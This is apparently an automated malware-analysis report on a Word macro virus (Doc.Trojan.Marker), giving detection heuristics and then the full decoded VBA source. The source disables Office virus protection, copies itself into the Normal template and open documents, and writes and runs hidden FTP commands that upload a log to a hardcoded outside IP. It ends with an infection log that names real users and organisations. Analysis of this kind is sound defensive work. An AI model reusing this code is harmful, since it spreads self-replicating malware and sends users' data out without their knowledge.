MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1553.005 Mark-of-the-Web Bypass
This malicious Word document contains VBA macros that attempt to disable macro security settings and replicate themselves to the normal template, indicating a self-propagation and persistence mechanism. The script also attempts to write specific content to 'c:\netldx.vxd' and includes hardcoded FTP-like commands, suggesting it may download additional payloads.
Heuristics 6
-
ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-31
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x40 bytes
Disassembly
Attempted x86 opcode disassembly0000267E 40 inc eax 0000267F 40 inc eax 00002680 40 inc eax 00002681 40 inc eax 00002682 40 inc eax 00002683 40 inc eax 00002684 40 inc eax 00002685 40 inc eax 00002686 40 inc eax 00002687 40 inc eax 00002688 40 inc eax 00002689 40 inc eax 0000268A 40 inc eax 0000268B 40 inc eax 0000268C 40 inc eax 0000268D 40 inc eax 0000268E 40 inc eax 0000268F 40 inc eax 00002690 40 inc eax 00002691 40 inc eax 00002692 40 inc eax 00002693 40 inc eax 00002694 40 inc eax 00002695 40 inc eax 00002696 40 inc eax 00002697 40 inc eax 00002698 40 inc eax 00002699 40 inc eax 0000269A 40 inc eax 0000269B 40 inc eax 0000269C 40 inc eax 0000269D 40 inc eax 0000269E 40 inc eax 0000269F 40 inc eax 000026A0 40 inc eax 000026A1 40 inc eax 000026A2 40 inc eax 000026A3 40 inc eax 000026A4 40 inc eax 000026A5 40 inc eax 000026A6 40 inc eax 000026A7 40 inc eax 000026A8 40 inc eax 000026A9 40 inc eax 000026AA 40 inc eax 000026AB 40 inc eax 000026AC 40 inc eax 000026AD 40 inc eax 000026AE 40 inc eax 000026AF 40 inc eax 000026B0 ffc4 inc esp 000026B2 00d3 add bl, dl 000026B4 0001 add byte ptr [ecx], al 000026B6 0002 add byte ptr [edx], al 000026B8 0203 add al, byte ptr [ebx] 000026BA 0101 add dword ptr [ecx], eax 000026BC 0000 add byte ptr [eax], al 000026BE 0000 add byte ptr [eax], al 000026C0 0000 add byte ptr [eax], al 000026C2 0000 add byte ptr [eax], al 000026C4 0000 add byte ptr [eax], al 000026C6 0107 add dword ptr [edi], eax 000026C8 06 push es 000026C9 0802 or byte ptr [edx], al 000026CB 0405 add al, 5 000026CD 0309 add ecx, dword ptr [ecx] 000026CF 1001 adc byte ptr [ecx], al 000026D1 0001 add byte ptr [ecx], al 000026D3 0302 add eax, dword ptr [edx] 000026D5 020406 add al, byte ptr [esi + eax] 000026D8 07 pop es 000026D9 120b adc cl, byte ptr [ebx] 000026DB 05 .byte 0x05 000026DC 07 pop es 000026DD 02 .byte 0x02
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7272 bytes |
SHA-256: 5fd49a440b3c0ea4d05449a7d979a7e506c1ef5c3fc174d2988f88304d3f436d |
|||
|
Detection
ClamAV:
Doc.Trojan.Marker-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const Marker = "<- this is a marker!"
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
Options.VirusProtection = False
If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
If DocumentInfected = True Then
LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
ElseIf NormalTemplateInfected = True Then
LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
End If
LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
For i = 1 To 4
LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
LogFile = "C:\hsf" & LogFile & ".sys"
Open LogFile For Output As #1
Print #1, LogData
Close #1
Open "c:\netldx.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Print #1, "pass itsme@"
Print #1, "cd incoming"
Print #1, "ascii"
Print #1, "put " & LogFile
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
End If
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
'Infect the NormalTemplate
If DocumentInfected = True Then
SaveNormalTemplate = NormalTemplate.Saved
OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
'Write a log file of this NormalTemplate infection
For i = 1 To Len(Application.UserAddress)
If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
End If
Else
UserAddress = UserAddress & Chr(13) & "' "
End If
Next i
OurCode = OurCode & Chr(13) & _
"' " & Format(Time, "hh:mm:ss AMPM - ") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & UserAddress & Chr(13)
nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString OurCode
If SaveNormalTemplate = True Then NormalTemplate.Save
End If
'Infect the ActiveDocument
If NormalTemplateInfected = True And _
(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
ActiveDocument.Saved = False) Then
SaveDocument = ActiveDocument.Saved
OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString OurCode
If SaveDocument = True Then ActiveDocument.Save
End If
End If
End Sub
' Logfile -->
' 09:08:36 - Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet
'
' 02:50:31 PM - Saturday, 28 Nov 1998
' MARK B. SEAY
'
' 08:04:45 AM - Friday, 4 Dec 1998
' UPS
'
' 11:43:35 AM - Thursday, 17 Dec 1998
' WRO
'
' 03:07:26 PM - Tuesday, 22 Dec 1998
' BCBSA
'
' 03:28:02 PM - Wednesday, 6 Jan 1999
' BCBSA
'
' 02:59:47 PM - Monday, 11 Jan 1999
' Marsha Veach
'
' 01:54:54 PM - Wednesday, 20 Jan 1999
' Connie Sandifer, CMP
'
' 09:33:06 PM - Monday, 25 Jan 1999
' Doug Rowan
'
' 08:21:12 AM - Wednesday, 27 Jan 1999
' IMSI
'
' 10:59:58 AM - Friday, 29 Jan 1999
' Raj
'
' 03:37:57 PM - Saturday, 30 Jan 1999
' hornd
'
' 01:26:48 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'
' 04:57:29 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'
' 06:35:44 PM - Tuesday, 2 Feb 1999
' Cooley Godward
'
' 04:23:52 PM - Thursday, 4 Feb 1999
' Cooley Godward
'
' 04:27:39 PM - Saturday, 6 Feb 1999
' Cooley Godward
'
' 06:18:06 PM - Monday, 8 Feb 1999
' Cooley Godward
'
' 09:17:17 PM - Tuesday, 9 Feb 1999
' hclee
'
' 04:44:45 PM - Wednesday, 17 Feb 1999
' Dr. W. Hsiao
' Wendy Hsiao, Ph.D.
' 04:13:19 PM - Tuesday, 23 Feb 1999
' CCST
'
' 10:09:35 AM - Saturday, 20 Mar 1999
' cpwu
'
' 09:33:49 AM - Thursday, 6 May 1999
' 柳建华
'
' 12:39:25 PM - Tuesday, 20 May 1997
' ghc-bbc
'
' 01:21:36 PM - Friday, 7 May 1999
' 李晋闽
'
' 05:51:53 - Wednesday, 12 May 1999
' qdzhuang
'
' 03:23:04 PM - Saturday, 19 Jun 1999
' 李晋闽
'
' 02:53:46 下午 - Tuesday, 6 Sep 2011
' 李晋闽
'
' 09:37:47 上午 - Monday, 19 Sep 2011
' 张士力
'
' 01:41:54 下午 - Monday, 26 Sep 2011
' unknown
'
' 10:50:02 上午 - Wednesday, 19 Oct 2011
' 祝昊泉
'
' 08:27:05 上午 - Wednesday, 26 Oct 2011
' 迟文倩
'
' 10:37:36 上午 - Monday, 31 Oct 2011
' 蒋运枫
'
' 04:21:38 下午 - Monday, 31 Oct 2011
' 李彩梅
'
' 08:15:53 上午 - Wednesday, 2 Nov 2011
' 张会芳
'
' 02:57:58 下午 - Thursday, 3 Nov 2011
' unknown
'
' 04:00:59 下午 - Thursday, 3 Nov 2011
' 田敏
'
' 09:41:48 上午 - Friday, 4 Nov 2011
' 钟虹
'
' 11:18:07 上午 - Monday, 7 Nov 2011
' unknown
'
' 03:01:17 下午 - Monday, 21 Nov 2011
' unknown
'
' 09:59:34 上午 - Wednesday, 28 Dec 2011
' unknown
'
' 11:26:57 上午 - Wednesday, 22 Feb 2012
' unknown
'
' 09:22:07 上午 - Monday, 30 Apr 2012
' 梁小兵
'
' 10:07:34 上午 - Monday, 7 May 2012
' 20068726
'
' 11:29:21 上午 - Friday, 1 Jun 2012
' 20066938
'
' 07:19:38 PM - Sunday, 3 Jun 2012
' User
'
' 04:24:06 下午 - Friday, 8 Jun 2012
' 20065673
'
' 11:01:27 上午 - Friday, 15 Jun 2012
' 贵大学生资助管理中心
'
' 11:12:24 上午 - Tuesday, 6 May 2014
' User
'
' 04:41:18 下午 - Thursday, 15 May 2014
' User
'
' 10:18:56 上午 - Tuesday, 20 May 2014
' User
'
' 08:56:37 上午 - Monday, 26 May 2014
' User
'
' 03:09:44 下午 - Monday, 26 May 2014
' Windows 用户
'
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.